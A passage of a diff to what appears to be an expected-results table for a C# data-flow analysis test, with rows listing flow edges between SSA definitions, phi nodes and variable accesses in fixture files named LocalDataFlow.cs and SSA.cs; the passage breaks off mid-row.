LocalDataFlow.cs:381:13:381:29 | [input] SSA phi(x) | -| LocalDataFlow.cs:381:13:381:29 | [input] SSA phi(x) | LocalDataFlow.cs:382:9:382:17 | SSA phi(x) | +| LocalDataFlow.cs:381:13:381:29 | SSA def(x) | LocalDataFlow.cs:382:15:382:15 | access to local variable x | | LocalDataFlow.cs:381:17:381:29 | "not tainted" | LocalDataFlow.cs:381:13:381:13 | access to local variable x | -| LocalDataFlow.cs:382:9:382:17 | SSA phi(x) | LocalDataFlow.cs:382:15:382:15 | access to local variable x | | SSA.cs:5:17:5:17 | SSA entry def(this.S) | SSA.cs:67:9:67:14 | access to field S | | SSA.cs:5:17:5:17 | this | SSA.cs:67:9:67:12 | this access | | SSA.cs:5:26:5:32 | SSA param(tainted) | SSA.cs:8:24:8:30 | access to parameter tainted | @@ -669,50 +664,41 @@ | SSA.cs:19:13:19:20 | access to local variable nonSink0 | SSA.cs:29:13:29:33 | [input] SSA phi read(nonSink0) | | SSA.cs:19:13:19:20 | access to local variable nonSink0 | SSA.cs:30:24:30:31 | access to local variable nonSink0 | | SSA.cs:22:16:22:23 | access to local variable ssaSink1 | SSA.cs:22:16:22:28 | SSA def(ssaSink1) | -| SSA.cs:22:16:22:28 | SSA def(ssaSink1) | SSA.cs:23:13:23:33 | [input] SSA phi(ssaSink1) | +| SSA.cs:22:16:22:28 | SSA def(ssaSink1) | SSA.cs:25:15:25:22 | access to local variable ssaSink1 | | SSA.cs:22:27:22:28 | "" | SSA.cs:22:16:22:23 | access to local variable ssaSink1 | | SSA.cs:23:13:23:22 | [post] access to parameter nonTainted | SSA.cs:29:13:29:22 | access to parameter nonTainted | | SSA.cs:23:13:23:22 | access to parameter nonTainted | SSA.cs:29:13:29:22 | access to parameter nonTainted | | SSA.cs:23:13:23:29 | access to property Length | SSA.cs:23:13:23:33 | ... > ... | | SSA.cs:23:13:23:33 | [input] SSA phi read(ssaSink0) | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | -| SSA.cs:23:13:23:33 | [input] SSA phi(ssaSink1) | SSA.cs:25:9:25:24 | SSA phi(ssaSink1) | | SSA.cs:24:13:24:20 | access to local variable ssaSink1 | SSA.cs:24:13:24:31 | SSA def(ssaSink1) | -| SSA.cs:24:13:24:31 | SSA def(ssaSink1) | SSA.cs:24:13:24:31 | [input] SSA phi(ssaSink1) | -| SSA.cs:24:13:24:31 | [input] SSA phi read(ssaSink0) | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | -| SSA.cs:24:13:24:31 | [input] SSA phi(ssaSink1) | SSA.cs:25:9:25:24 | SSA phi(ssaSink1) | +| SSA.cs:24:13:24:31 | SSA def(ssaSink1) | SSA.cs:25:15:25:22 | access to local variable ssaSink1 | | SSA.cs:24:24:24:31 | access to local variable ssaSink0 | SSA.cs:24:13:24:20 | access to local variable ssaSink1 | -| SSA.cs:24:24:24:31 | access to local variable ssaSink0 | SSA.cs:24:13:24:31 | [input] SSA phi read(ssaSink0) | +| SSA.cs:24:24:24:31 | access to local variable ssaSink0 | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | SSA.cs:35:13:35:33 | [input] SSA phi read(ssaSink0) | | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | SSA.cs:37:24:37:31 | access to local variable ssaSink0 | -| SSA.cs:25:9:25:24 | SSA phi(ssaSink1) | SSA.cs:25:15:25:22 | access to local variable ssaSink1 | | SSA.cs:28:16:28:23 | access to local variable nonSink1 | SSA.cs:28:16:28:28 | SSA def(nonSink1) | -| SSA.cs:28:16:28:28 | SSA def(nonSink1) | SSA.cs:29:13:29:33 | [input] SSA phi(nonSink1) | +| SSA.cs:28:16:28:28 | SSA def(nonSink1) | SSA.cs:31:15:31:22 | access to local variable nonSink1 | | SSA.cs:28:27:28:28 | "" | SSA.cs:28:16:28:23 | access to local variable nonSink1 | | SSA.cs:29:13:29:22 | [post] access to parameter nonTainted | SSA.cs:35:13:35:22 | access to parameter nonTainted | | SSA.cs:29:13:29:22 | access to parameter nonTainted | SSA.cs:35:13:35:22 | access to parameter nonTainted | | SSA.cs:29:13:29:29 | access to property Length | SSA.cs:29:13:29:33 | ... > ... | | SSA.cs:29:13:29:33 | [input] SSA phi read(nonSink0) | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | -| SSA.cs:29:13:29:33 | [input] SSA phi(nonSink1) | SSA.cs:31:9:31:24 | SSA phi(nonSink1) | | SSA.cs:30:13:30:20 | access to local variable nonSink1 | SSA.cs:30:13:30:31 | SSA def(nonSink1) | -| SSA.cs:30:13:30:31 | SSA def(nonSink1) | SSA.cs:30:13:30:31 | [input] SSA phi(nonSink1) | -| SSA.cs:30:13:30:31 | [input] SSA phi read(nonSink0) | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | -| SSA.cs:30:13:30:31 | [input] SSA phi(nonSink1) | SSA.cs:31:9:31:24 | SSA phi(nonSink1) | +| SSA.cs:30:13:30:31 | SSA def(nonSink1) | SSA.cs:31:15:31:22 | access to local variable nonSink1 | | SSA.cs:30:24:30:31 | access to local variable nonSink0 | SSA.cs:30:13:30:20 | access to local variable nonSink1 | -| SSA.cs:30:24:30:31 | access to local variable nonSink0 | SSA.cs:30:13:30:31 | [input] SSA phi read(nonSink0) | +| SSA.cs:30:24:30:31 | access to local variable nonSink0 | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | SSA.cs:47:13:47:33 | [input] SSA phi read(nonSink0) | | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | SSA.cs:49:24:49:31 | access to local variable nonSink0 | -| SSA.cs:31:9:31:24 | SSA phi(nonSink1) | SSA.cs:31:15:31:22 | access to local variable nonSink1 | | SSA.cs:34:16:34:23 | access to local variable ssaSink2 | SSA.cs:34:16:34:28 | SSA def(ssaSink2) | -| SSA.cs:34:16:34:28 | SSA def(ssaSink2) | SSA.cs:35:13:35:33 | [input] SSA phi(ssaSink2) | +| SSA.cs:34:16:34:28 | SSA def(ssaSink2) | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | | SSA.cs:34:27:34:28 | "" | SSA.cs:34:16:34:23 | access to local variable ssaSink2 | | SSA.cs:35:13:35:22 | [post] access to parameter nonTainted | SSA.cs:35:13:35:33 | [input] SSA phi read(nonTainted) | | SSA.cs:35:13:35:22 | [post] access to parameter nonTainted | SSA.cs:38:17:38:26 | access to parameter nonTainted | | SSA.cs:35:13:35:22 | access to parameter nonTainted | SSA.cs:35:13:35:33 | [input] SSA phi read(nonTainted) | | SSA.cs:35:13:35:22 | access to parameter nonTainted | SSA.cs:38:17:38:26 | access to parameter nonTainted | | SSA.cs:35:13:35:29 | access to property Length | SSA.cs:35:13:35:33 | ... > ... | -| SSA.cs:35:13:35:33 | [input] SSA phi read(nonTainted) | SSA.cs:43:9:43:24 | SSA phi read(nonTainted) | +| SSA.cs:35:13:35:33 | [input] SSA phi read(nonTainted) | SSA.cs:47:13:47:22 | access to parameter nonTainted | | SSA.cs:35:13:35:33 | [input] SSA phi read(ssaSink0) | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | -| SSA.cs:35:13:35:33 | [input] SSA phi(ssaSink2) | SSA.cs:43:9:43:24 | SSA phi(ssaSink2) | | SSA.cs:37:13:37:20 | access to local variable ssaSink2 | SSA.cs:37:13:37:31 | SSA def(ssaSink2) | | SSA.cs:37:13:37:31 | SSA def(ssaSink2) | SSA.cs:39:21:39:28 | access to local variable ssaSink2 | | SSA.cs:37:13:37:31 | SSA def(ssaSink2) | SSA.cs:41:21:41:28 | access to local variable ssaSink2 | @@ -724,31 +710,26 @@ | SSA.cs:38:17:38:26 | access to parameter nonTainted | SSA.cs:39:17:39:29 | [input] SSA phi read(nonTainted) | | SSA.cs:38:17:38:26 | access to parameter nonTainted | SSA.cs:41:17:41:29 | [input] SSA phi read(nonTainted) | | SSA.cs:38:17:38:33 | access to property Length | SSA.cs:38:17:38:37 | ... > ... | -| SSA.cs:39:17:39:29 | [input] SSA phi read(nonTainted) | SSA.cs:43:9:43:24 | SSA phi read(nonTainted) | +| SSA.cs:39:17:39:29 | [input] SSA phi read(nonTainted) | SSA.cs:47:13:47:22 | access to parameter nonTainted | | SSA.cs:39:17:39:29 | [input] SSA phi read(ssaSink0) | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | -| SSA.cs:39:17:39:29 | [input] SSA phi(ssaSink2) | SSA.cs:43:9:43:24 | SSA phi(ssaSink2) | -| SSA.cs:39:21:39:28 | [post] access to local variable ssaSink2 | SSA.cs:39:17:39:29 | [input] SSA phi(ssaSink2) | -| SSA.cs:39:21:39:28 | access to local variable ssaSink2 | SSA.cs:39:17:39:29 | [input] SSA phi(ssaSink2) | -| SSA.cs:41:17:41:29 | [input] SSA phi read(nonTainted) | SSA.cs:43:9:43:24 | SSA phi read(nonTainted) | +| SSA.cs:39:21:39:28 | [post] access to local variable ssaSink2 | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | +| SSA.cs:39:21:39:28 | access to local variable ssaSink2 | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | +| SSA.cs:41:17:41:29 | [input] SSA phi read(nonTainted) | SSA.cs:47:13:47:22 | access to parameter nonTainted | | SSA.cs:41:17:41:29 | [input] SSA phi read(ssaSink0) | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | -| SSA.cs:41:17:41:29 | [input] SSA phi(ssaSink2) | SSA.cs:43:9:43:24 | SSA phi(ssaSink2) | -| SSA.cs:41:21:41:28 | [post] access to local variable ssaSink2 | SSA.cs:41:17:41:29 | [input] SSA phi(ssaSink2) | -| SSA.cs:41:21:41:28 | access to local variable ssaSink2 | SSA.cs:41:17:41:29 | [input] SSA phi(ssaSink2) | -| SSA.cs:43:9:43:24 | SSA phi read(nonTainted) | SSA.cs:47:13:47:22 | access to parameter nonTainted | +| SSA.cs:41:21:41:28 | [post] access to local variable ssaSink2 | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | +| SSA.cs:41:21:41:28 | access to local variable ssaSink2 | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | SSA.cs:89:13:89:33 | [input] SSA phi read(ssaSink0) | | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | SSA.cs:91:24:91:31 | access to local variable ssaSink0 | -| SSA.cs:43:9:43:24 | SSA phi(ssaSink2) | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | | SSA.cs:46:16:46:23 | access to local variable nonSink2 | SSA.cs:46:16:46:28 | SSA def(nonSink2) | -| SSA.cs:46:16:46:28 | SSA def(nonSink2) | SSA.cs:47:13:47:33 | [input] SSA phi(nonSink2) | +| SSA.cs:46:16:46:28 | SSA def(nonSink2) | SSA.cs:55:15:55:22 | access to local variable nonSink2 | | SSA.cs:46:27:46:28 | "" | SSA.cs:46:16:46:23 | access to local variable nonSink2 | | SSA.cs:47:13:47:22 | [post] access to parameter nonTainted | SSA.cs:47:13:47:33 | [input] SSA phi read(nonTainted) | | SSA.cs:47:13:47:22 | [post] access to parameter nonTainted | SSA.cs:50:17:50:26 | access to parameter nonTainted | | SSA.cs:47:13:47:22 | access to parameter nonTainted | SSA.cs:47:13:47:33 | [input] SSA phi read(nonTainted) | | SSA.cs:47:13:47:22 | access to parameter nonTainted | SSA.cs:50:17:50:26 | access to parameter nonTainted | | SSA.cs:47:13:47:29 | access to property Length | SSA.cs:47:13:47:33 | ... > ... | -| SSA.cs:47:13:47:33 | [input] SSA phi read(nonSink0) | SSA.cs:55:9:55:24 | SSA phi read(nonSink0) | -| SSA.cs:47:13:47:33 | [input] SSA phi read(nonTainted) | SSA.cs:55:9:55:24 | SSA phi read(nonTainted) | -| SSA.cs:47:13:47:33 | [input] SSA phi(nonSink2) | SSA.cs:55:9:55:24 | SSA phi(nonSink2) | +| SSA.cs:47:13:47:33 | [input] SSA phi read(nonSink0) | SSA.cs:63:23:63:30 | access to local variable nonSink0 | +| SSA.cs:47:13:47:33 | [input] SSA phi read(nonTainted) | SSA.cs:89:13:89:22 | access to parameter nonTainted | | SSA.cs:49:13:49:20 | access to local variable nonSink2 | SSA.cs:49:13:49:31 | SSA def(nonSink2) | | SSA.cs:49:13:49:31 | SSA def(nonSink2) | SSA.cs:51:21:51:28 | access to local variable nonSink2 | | SSA.cs:49:13:49:31 | SSA def(nonSink2) | SSA.cs:53:21:53:28 | access to local variable nonSink2 | @@ -760,19 +741,14 @@ | SSA.cs:50:17:50:26 | access to parameter nonTainted | SSA.cs:51:17:51:29 | [input] SSA phi read(nonTainted) | | SSA.cs:50:17:50:26 | access to parameter nonTainted | SSA.cs:53:17:53:29 | [input] SSA phi read(nonTainted) | | SSA.cs:50:17:50:33 | access to property Length | SSA.cs:50:17:50:37 | ... > ... | -| SSA.cs:51:17:51:29 | [input] SSA phi read(nonSink0) | SSA.cs:55:9:55:24 | SSA phi read(nonSink0) | -| SSA.cs:51:17:51:29 | [input] SSA phi read(nonTainted) | SSA.cs:55:9:55:24 | SSA phi read(nonTainted) | -| SSA.cs:51:17:51:29 | [input] SSA phi(nonSink2) | SSA.cs:55:9:55:24 | SSA phi(nonSink2) | -| SSA.cs:51:21:51:28 | [post] access to local variable nonSink2 | SSA.cs:51:17:51:29 | [input] SSA phi(nonSink2) | -| SSA.cs:51:21:51:28 | access to local variable nonSink2 | SSA.cs:51:17:51:29 | [input] SSA phi(nonSink2) | -| SSA.cs:53:17:53:29 | [input] SSA phi read(nonSink0) | SSA.cs:55:9:55:24 | SSA phi read(nonSink0) | -| SSA.cs:53:17:53:29 | [input] SSA phi read(nonTainted) | SSA.cs:55:9:55:24 | SSA phi read(nonTainted) | -| SSA.cs:53:17:53:29 | [input] SSA phi(nonSink2) | SSA.cs:55:9:55:24 | SSA phi(nonSink2) | -| SSA.cs:53:21:53:28 | [post] access to local variable nonSink2 | SSA.cs:53:17:53:29 | [input] SSA phi(nonSink2) | -| SSA.cs:53:21:53:28 | access to local variable nonSink2 | SSA.cs:53:17:53:29 | [input] SSA phi(nonSink2) | -| SSA.cs:55:9:55:24 | SSA phi read(nonSink0) | SSA.cs:63:23:63:30 | access to local variable nonSink0 | -| SSA.cs:55:9:55:24 | SSA phi read(nonTainted) | SSA.cs:89:13:89:22 | access to parameter nonTainted | -| SSA.cs:55:9:55:24 | SSA phi(nonSink2) | SSA.cs:55:15:55:22 | access to local variable nonSink2 | +| SSA.cs:51:17:51:29 | [input] SSA phi read(nonSink0) | SSA.cs:63:23:63:30 | access to local variable nonSink0 | +| SSA.cs:51:17:51:29 | [input] SSA phi read(nonTainted) | SSA.cs:89:13:89:22 | access to parameter nonTainted | +| SSA.cs:51:21:51:28 | [post] access to local variable nonSink2 | SSA.cs:55:15:55:22 | access to local variable nonSink2 | +| SSA.cs:51:21:51:28 | access to local variable nonSink2 | SSA.cs:55:15:55:22 | access to local variable nonSink2 | +| SSA.cs:53:17:53:29 | [input] SSA phi read(nonSink0) | SSA.cs:63:23:63:30 | access to local variable nonSink0 | +| SSA.cs:53:17:53:29 | [input] SSA phi read(nonTainted) | SSA.cs:89:13:89:22 | access to parameter nonTainted | +| SSA.cs:53:21:53:28 | [post] access to local variable nonSink2 | SSA.cs:55:15:55:22 | access to local variable nonSink2 | +| SSA.cs:53:21:53:28 | access to local variable nonSink2 | SSA.cs:55:15:55:22 | access to local variable nonSink2 | | SSA.cs:58:16:58:23 | access to local variable ssaSink3 | SSA.cs:58:16:58:33 | SSA def(ssaSink3) | | SSA.cs:58:16:58:33 | SSA def(ssaSink3) | SSA.cs:59:23:59:30 | access to local variable ssaSink3 | | SSA.cs:58:27:58:33 | access to parameter tainted | SSA.cs:58:16:58:23 | access to local variable ssaSink3 | @@ -860,16 +836,15 @@ | SSA.cs:85:15:85:20 | [post] access to field S | SSA.cs:114:9:114:14 | access to field S | | SSA.cs:85:15:85:20 | access to field S | SSA.cs:114:9:114:14 | access to field S | | SSA.cs:88:16:88:23 | access to local variable ssaSink4 | SSA.cs:88:16:88:28 | SSA def(ssaSink4) | -| SSA.cs:88:16:88:28 | SSA def(ssaSink4) | SSA.cs:89:13:89:33 | [input] SSA phi(ssaSink4) | +| SSA.cs:88:16:88:28 | SSA def(ssaSink4) | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | | SSA.cs:88:27:88:28 | "" | SSA.cs:88:16:88:23 | access to local variable ssaSink4 | | SSA.cs:89:13:89:22 | [post] access to parameter nonTainted | SSA.cs:89:13:89:33 | [input] SSA phi read(nonTainted) | | SSA.cs:89:13:89:22 | [post] access to parameter nonTainted | SSA.cs:92:17:92:26 | access to parameter nonTainted | | SSA.cs:89:13:89:22 | access to parameter nonTainted | SSA.cs:89:13:89:33 | [input] SSA phi read(nonTainted) | | SSA.cs:89:13:89:22 | access to parameter nonTainted | SSA.cs:92:17:92:26 | access to parameter nonTainted | | SSA.cs:89:13:89:29 | access to property Length | SSA.cs:89:13:89:33 | ... > ... | -| SSA.cs:89:13:89:33 | [input] SSA phi read(nonTainted) | SSA.cs:97:9:97:32 | SSA phi read(nonTainted) | -| SSA.cs:89:13:89:33 | [input] SSA phi read(ssaSink0) | SSA.cs:97:9:97:32 | SSA phi read(ssaSink0) | -| SSA.cs:89:13:89:33 | [input] SSA phi(ssaSink4) | SSA.cs:97:9:97:32 | SSA phi(ssaSink4) | +| SSA.cs:89:13:89:33 | [input] SSA phi read(nonTainted) | SSA.cs:102:13:102:22 | access to parameter nonTainted | +| SSA.cs:89:13:89:33 | [input] SSA phi read(ssaSink0) | SSA.cs:117:36:117:43 | access to local variable ssaSink0 | | SSA.cs:91:13:91:20 | access to local variable ssaSink4 | SSA.cs:91:13:91:31 | SSA def(ssaSink4) | | SSA.cs:91:13:91:31 | SSA def(ssaSink4) | SSA.cs:93:21:93:28 | access to local variable ssaSink4 | | SSA.cs:91:13:91:31 | SSA def(ssaSink4) | SSA.cs:95:21:95:28 | access to local variable ssaSink4 | @@ -881,34 +856,28 @@ | SSA.cs:92:17:92:26 | access to parameter nonTainted | SSA.cs:93:17:93:29 | [input] SSA phi read(nonTainted) | | SSA.cs:92:17:92:26 | access to parameter nonTainted | SSA.cs:95:17:95:29 | [input] SSA phi read(nonTainted) | | SSA.cs:92:17:92:33 | access to property Length | SSA.cs:92:17:92:37 | ... > ... | -| SSA.cs:93:17:93:29 | [input] SSA phi read(nonTainted) | SSA.cs:97:9:97:32 | SSA phi read(nonTainted) | -| SSA.cs:93:17:93:29 | [input] SSA phi read(ssaSink0) | SSA.cs:97:9:97:32 | SSA phi read(ssaSink0) | -| SSA.cs:93:17:93:29 | [input] SSA phi(ssaSink4) | SSA.cs:97:9:97:32 | SSA phi(ssaSink4) | -| SSA.cs:93:21:93:28 | [post] access to local variable ssaSink4 | SSA.cs:93:17:93:29 | [input] SSA phi(ssaSink4) | -| SSA.cs:93:21:93:28 | access to local variable ssaSink4 | SSA.cs:93:17:93:29 | [input] SSA phi(ssaSink4) | -| SSA.cs:95:17:95:29 | [input] SSA phi read(nonTainted) | SSA.cs:97:9:97:32 | SSA phi read(nonTainted) | -| SSA.cs:95:17:95:29 | [input] SSA phi read(ssaSink0) | SSA.cs:97:9:97:32 | SSA phi read(ssaSink0) | -| SSA.cs:95:17:95:29 | [input] SSA phi(ssaSink4) | SSA.cs:97:9:97:32 | SSA phi(ssaSink4) | -| SSA.cs:95:21:95:28 | [post] access to local variable ssaSink4 | SSA.cs:95:17:95:29 | [input] SSA phi(ssaSink4) | -| SSA.cs:95:21:95:28 | access to local variable ssaSink4 | SSA.cs:95:17:95:29 | [input] SSA phi(ssaSink4) | -| SSA.cs:97:9:97:32 | SSA phi read(nonTainted) | SSA.cs:102:13:102:22 | access to parameter nonTainted | -| SSA.cs:97:9:97:32 | SSA phi read(ssaSink0) | SSA.cs:117:36:117:43 | access to local variable ssaSink0 | -| SSA.cs:97:9:97:32 | SSA phi(ssaSink4) | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | +| SSA.cs:93:17:93:29 | [input] SSA phi read(nonTainted) | SSA.cs:102:13:102:22 | access to parameter nonTainted | +| SSA.cs:93:17:93:29 | [input] SSA phi read(ssaSink0) | SSA.cs:117:36:117:43 | access to local variable ssaSink0 | +| SSA.cs:93:21:93:28 | [post] access to local variable ssaSink4 | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | +| SSA.cs:93:21:93:28 | access to local variable ssaSink4 | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | +| SSA.cs:95:17:95:29 | [input] SSA phi read(nonTainted) | SSA.cs:102:13:102:22 | access to parameter nonTainted | +| SSA.cs:95:17:95:29 | [input] SSA phi read(ssaSink0) | SSA.cs:117:36:117:43 | access to local variable ssaSink0 | +| SSA.cs:95:21:95:28 | [post] access to local variable ssaSink4 | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | +| SSA.cs:95:21:95:28 | access to local variable ssaSink4 | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | | SSA.cs:97:23:97:30 | SSA def(ssaSink4) | SSA.cs:98:15:98:22 | access to local variable ssaSink4 | | SSA.cs:97:23:97:30 | [post] access to local variable ssaSink4 | SSA.cs:97:23:97:30 | SSA def(ssaSink4) | | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | SSA.cs:97:23:97:30 | SSA def(ssaSink4) | | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | SSA.cs:97:23:97:30 | SSA def(ssaSink4) | | SSA.cs:101:16:101:23 | access to local variable nonSink3 | SSA.cs:101:16:101:28 | SSA def(nonSink3) | -| SSA.cs:101:16:101:28 | SSA def(nonSink3) | SSA.cs:102:13:102:33 | [input] SSA phi(nonSink3) | +| SSA.cs:101:16:101:28 | SSA def(nonSink3) | SSA.cs:110:23:110:30 | access to local variable nonSink3 | | SSA.cs:101:27:101:28 | "" | SSA.cs:101:16:101:23 | access to local variable nonSink3 | | SSA.cs:102:13:102:22 | [post] access to parameter nonTainted | SSA.cs:102:13:102:33 | [input] SSA phi read(nonTainted) | | SSA.cs:102:13:102:22 | [post] access to parameter nonTainted | SSA.cs:105:17:105:26 | access to parameter nonTainted | | SSA.cs:102:13:102:22 | access to parameter nonTainted | SSA.cs:102:13:102:33 | [input] SSA phi read(nonTainted) | | SSA.cs:102:13:102:22 | access to parameter nonTainted | SSA.cs:105:17:105:26 | access to parameter nonTainted | | SSA.cs:102:13:102:29 | access to property Length | SSA.cs:102:13:102:33 | ... > ... | -| SSA.cs:102:13:102:33 | [input] SSA phi read(nonSink0) | SSA.cs:110:9:110:32 | SSA phi read(nonSink0) | -| SSA.cs:102:13:102:33 | [input] SSA phi read(nonTainted) | SSA.cs:110:9:110:32 | SSA phi read(nonTainted) | -| SSA.cs:102:13:102:33 | [input] SSA phi(nonSink3) | SSA.cs:110:9:110:32 | SSA phi(nonSink3) | +| SSA.cs:102:13:102:33 | [input] SSA phi read(nonSink0) | SSA.cs:130:39:130:46 | access to local variable nonSink0 | +| SSA.cs:102:13:102:33 | [input] SSA phi read(nonTainted) | SSA.cs:115:13:115:22 | access to parameter nonTainted | | SSA.cs:104:13:104:20 | access to local variable nonSink3 | SSA.cs:104:13:104:31 | SSA def(nonSink3) | | SSA.cs:104:13:104:31 | SSA def(nonSink3) | SSA.cs:106:21:106:28 | access to local variable nonSink3 | | SSA.cs:104:13:104:31 | SSA def(nonSink3) | SSA.cs:108:21:108:28 | access to local variable nonSink3 | @@ -920,19 +889,14 @@ | SSA.cs:105:17:105:26 | access to parameter nonTainted | SSA.cs:106:17:106:29 | [input] SSA phi read(nonTainted) | | SSA.cs:105:17:105:26 | access to parameter nonTainted | SSA.cs:108:17:108:29 | [input] SSA phi read(nonTainted) | | SSA.cs:105:17:105:33 | access to property Length | SSA.cs:105:17:105:37 | ... > ... | -| SSA.cs:106:17:106:29 | [input] SSA phi read(nonSink0) | SSA.cs:110:9:110:32 | SSA phi read(nonSink0) | -| SSA.cs:106:17:106:29 | [input] SSA phi read(nonTainted) | SSA.cs:110:9:110:32 | SSA phi read(nonTainted) | -| SSA.cs:106:17:106:29 | [input] SSA phi(nonSink3) | SSA.cs:110:9:110:32 | SSA phi(nonSink3) | -| SSA.cs:106:21:106:28 | [post] access to local variable nonSink3 | SSA.cs:106:17:106:29 | [input] SSA phi(nonSink3) | -| SSA.cs:106:21:106:28 | access to local variable nonSink3 | SSA.cs:106:17:106:29 | [input] SSA phi(nonSink3) | -| SSA.cs:108:17:108:29 | [input] SSA phi read(nonSink0) | SSA.cs:110:9:110:32 | SSA phi read(nonSink0) | -| SSA.cs:108:17:108:29 | [input] SSA phi read(nonTainted) | SSA.cs:110:9:110:32 | SSA phi read(nonTainted) | -| SSA.cs:108:17:108:29 | [input] SSA phi(nonSink3) | SSA.cs:110:9:110:32 | SSA phi(nonSink3) | -| SSA.cs:108:21:108:28 | [post] access to local variable nonSink3 | SSA.cs:108:17:108:29 | [input] SSA phi(nonSink3) | -| SSA.cs:108:21:108:28 | access to local variable nonSink3 | SSA.cs:108:17:108:29 | [input] SSA phi(nonSink3) | -| SSA.cs:110:9:110:32 | SSA phi read(nonSink0) | SSA.cs:130:39:130:46 | access to local variable nonSink0 | -| SSA.cs:110:9:110:32 | SSA phi read(nonTainted) | SSA.cs:115:13:115:22 | access to parameter nonTainted | -| SSA.cs:110:9:110:32 | SSA phi(nonSink3) | SSA.cs:110:23:110:30 | access to local variable nonSink3 | +| SSA.cs:106:17:106:29 | [input] SSA phi read(nonSink0) | SSA.cs:130:39:130:46 | access to local variable nonSink0 | +| SSA.cs:106:17:106:29 | [input] SSA phi read(nonTainted) | SSA.cs:115:13:115:22 | access to parameter nonTainted | +| SSA.cs:106:21:106:28 | [post] access to local variable nonSink3 | SSA.cs:110:23:110:30 | access to local variable nonSink3 | +| SSA.cs:106:21:106:28 | access to local variable nonSink3 | SSA.cs:110:23:110:30 | access to local variable nonSink3 | +| SSA.cs:108:17:108:29 | [input] SSA phi read(nonSink0) | SSA.cs:130:39:130:46 | access to local variable nonSink0 | +| SSA.cs:108:17:108:29 | [input] SSA phi read(nonTainted) | SSA.cs:115:13:115:22 | access to parameter nonTainted | +| SSA.cs:108:21:108:28 | [post] access to local variable nonSink3 | SSA.cs:110:23:110:30 | access to local variable nonSink3 | +| SSA.cs:108:21:108:28 | access to local variable nonSink3 | SSA.cs:110:23:110:30 | access to local variable nonSink3 | | SSA.cs:110:23:110:30 | SSA def(nonSink3) | SSA.cs:111:15:111:22 | access to local variable nonSink3 | | SSA.cs:110:23:110:30 | [post] access to local variable nonSink3 | SSA.cs:110:23:110:30 | SSA def(nonSink3) | | SSA.cs:110:23:110:30 | access to local variable nonSink3 | SSA.cs:110:23:110:30 | SSA def(nonSink3) | @@ -946,16 +910,15 @@ | SSA.cs:114:9:114:14 | access to field S | SSA.cs:115:13:115:33 | [input] SSA phi read(this.S) | | SSA.cs:114:9:114:14 | access to field S | SSA.cs:117:13:117:18 | access to field S | | SSA.cs:114:9:114:28 | access to field SsaFieldSink1 | SSA.cs:114:9:114:33 | SSA def(this.S.SsaFieldSink1) | -| SSA.cs:114:9:114:33 | SSA def(this.S.SsaFieldSink1) | SSA.cs:115:13:115:33 | [input] SSA phi(this.S.SsaFieldSink1) | +| SSA.cs:114:9:114:33 | SSA def(this.S.SsaFieldSink1) | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | | SSA.cs:114:32:114:33 | "" | SSA.cs:114:9:114:28 | access to field SsaFieldSink1 | | SSA.cs:115:13:115:22 | [post] access to parameter nonTainted | SSA.cs:115:13:115:33 | [input] SSA phi read(nonTainted) | | SSA.cs:115:13:115:22 | [post] access to parameter nonTainted | SSA.cs:118:17:118:26 | access to parameter nonTainted | | SSA.cs:115:13:115:22 | access to parameter nonTainted | SSA.cs:115:13:115:33 | [input] SSA phi read(nonTainted) | | SSA.cs:115:13:115:22 | access to parameter nonTainted | SSA.cs:118:17:118:26 | access to parameter nonTainted | | SSA.cs:115:13:115:29 | access to property Length | SSA.cs:115:13:115:33 | ... > ... | -| SSA.cs:115:13:115:33 | [input] SSA phi read(nonTainted) | SSA.cs:123:9:123:30 | SSA phi read(nonTainted) | -| SSA.cs:115:13:115:33 | [input] SSA phi read(this.S) | SSA.cs:123:9:123:30 | SSA phi read(this.S) | -| SSA.cs:115:13:115:33 | [input] SSA phi(this.S.SsaFieldSink1) | SSA.cs:123:9:123:30 | SSA phi(this.S.SsaFieldSink1) | +| SSA.cs:115:13:115:33 | [input] SSA phi read(nonTainted) | SSA.cs:128:13:128:22 | access to parameter nonTainted | +| SSA.cs:115:13:115:33 | [input] SSA phi read(this.S) | SSA.cs:123:23:123:28 | access to field S | | SSA.cs:117:13:117:16 | [post] this access | SSA.cs:119:21:119:24 | this access | | SSA.cs:117:13:117:16 | [post] this access | SSA.cs:121:21:121:24 | this access | | SSA.cs:117:13:117:16 | this access | SSA.cs:119:21:119:24 | this access | @@ -973,27 +936,20 @@ | SSA.cs:118:17:118:26 | access to parameter nonTainted | SSA.cs:119:17:119:41 | [input] SSA phi read(nonTainted) | | SSA.cs:118:17:118:26 | access to parameter nonTainted | SSA.cs:121:17:121:41 | [input] SSA phi read(nonTainted) | | SSA.cs:118:17:118:33 | access to property Length | SSA.cs:118:17:118:37 | ... > ... | -| SSA.cs:119:17:119:41 | [input] SSA phi read(nonTainted) | SSA.cs:123:9:123:30 | SSA phi read(nonTainted) | -| SSA.cs:119:17:119:41 | [input] SSA phi read(this.S) | SSA.cs:123:9:123:30 | SSA phi read(this.S) | -| SSA.cs:119:17:119:41 | [input] SSA 